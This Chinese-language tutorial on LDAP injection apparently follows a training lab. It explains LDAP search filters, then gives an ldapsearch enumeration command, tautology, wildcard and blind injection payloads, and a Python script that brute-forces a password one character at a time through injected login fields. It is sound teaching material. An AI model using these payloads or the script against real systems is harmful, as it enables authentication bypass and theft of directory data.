LDAP Injection

注意：仅作学习之用，尊法守法，切勿违法操作。

一、介绍

LDAP：轻量级目录访问协议，能使组织能够集中管理用户，以及组和其他目录信息，这些信息常用于网络和内部应用中的身份验证和授权目的。数据呈树状结构，读性能强。

例如：

Microsoft Active Directory：这是一项面向 Windows 域网络的服务，利用 LDAP 作为其底层协议套件的一部分来管理域资源。

OpenLDAP：LDAP 的开源实现，广泛用于管理用户信息并支持跨多个平台的认证机制。

类似文件夹一层一层便于检索，当企业中有不同部门、多种多台设备、大量用户时，通过LDAP，将其进行分组整理划分，一层一层下来，便可以将资源权限划分清楚。

二、搜索查询

通过LDAP搜索查询，可以定位检索目录中存储的信息。

1. 搜索查询的基本语法：

(base DN) (scope) (filter) (attributes)

解释：

base DN: 目录树中搜索的起点

Scope：它定义了从base DN开始搜索的深度，可以是base（仅搜索 base 的 DN）、one（搜索基底 DN 的直接子节点、sub（搜索基础 DN 及其所有后代）。

Filter：过滤条件(=、&、|、！等符号)。

Attributes：要返回的信息。

(&(objectClass=user)(|(cn=John*)(cn=Jane*)))

对象类中被归类为“user”且以“John”或“Jane”开头（*为通配符）。

三、攻击

1.

LDAP 服务就像企业内网里的 “中央通讯录”，平时藏在内部，一般不会直接暴露在公网上。但它确实有两个标准 “门”：

• 389 端口：默认端口，用于未加密连接，或者先明文再升级到 TLS（StartTLS）。
• 636 端口：加密端口，全程用 SSL/TLS 加密，更安全。

如果管理员配置不当，把这两个端口直接暴露到公网，任何人都能通过工具去 “敲门”。其中最常用的工具就是 OpenLDAP 里的ldapsearch。

ldapsearch -x -H ldap://MACHINE_IP:389 -b "dc=ldap,dc=thm" "(ou=People)"

对管理员来说：

• 可以批量查询用户、组、权限信息。
• 方便做自动化运维和目录同步。

对攻击者来说：

• 可以用来探测 LDAP 服务是否存在、版本是什么。
• 一旦发现注入漏洞，就能用它批量枚举用户、提取敏感属性，甚至构造恶意查询。

2.注入原理

当用户输入在被纳入 LDAP 查询前未得到适当净化时就会发生LDAP注入。该过程类似SQL注入。

攻击方向：认证绕过、未授权数据访问、读写数据。

攻击流程：

①攻击者提交恶意输入。

username=f*&password=*

②Web应用未对输入进行过滤，导致恶意查询被拼接发送。

(&(uid=f*)(userPassword=*))

③LDAP服务器执行并返回结果。

应用直接信任并使用了用户提交的数据，没有对*、(、)等特殊字符进行转义。

3.LDAP的利用

(&(uid={userInput})(userPassword={passwordInput})) //下述注入技术将会从该式展开

永真式注入：

*)(|(&

拼接后

(&(uid=*)(|(&)(userPassword=pwd)))

uid可以为所有用户；|要么&，要么password=pwd，满足一个即可。

万用式注入：

*

*可以匹配任意字符序列。

Blind LDAP Injection：

这种情况下，攻击者不会直接接收注入有效载荷的输出。相反，他们必须根据应用程序的行为推断信息。这种攻击更具挑战性，但仍可用于从 LDAP 目录中提取敏感信息。

猜测用户名第一个字符为a：(&(uid=a*)(|(&)(userPassword=pwd))) 通过穷举所有可能的字符（字符集），确定第一个字符，之后 猜测用户名第二个字符为b：(&(uid=ab*)(|(&)(userPassword=pwd))) ... ... 一个一个猜下去，观察系统输出。

对于输入有时需要进行URL等编码以绕过过滤。

4.自动化

自动化脚本，可以根据实际情况做修改

import requests from bs4 import BeautifulSoup import string import time # 1. 修改目标URL url = 'http://TARGET_IP/ldap_login.php' # 2. 调整字符集 char_set = string.ascii_letters + string.digits + "._@" successful_chars = '' headers = {'Content-Type': 'application/x-www-form-urlencoded'} while True: found = False for char in char_set: # 3. 调整Payload（根据靶场语法修改） data = { 'username': f'user*)(&(password={successful_chars}{char}*))', 'password': 'test' } try: # 4. 增加超时和延迟 response = requests.post(url, data=data, headers=headers, timeout=10) time.sleep(0.3) # 5. 修改响应判断逻辑（示例：页面包含“验证通过”） if "验证通过" in response.text: successful_chars += char print(f"找到字符：{char} | 当前已拼：{successful_chars}") found = True break except Exception as e: print(f"请求出错：{e}") continue if not found: break print(f"最终爆破结果：{successful_chars}")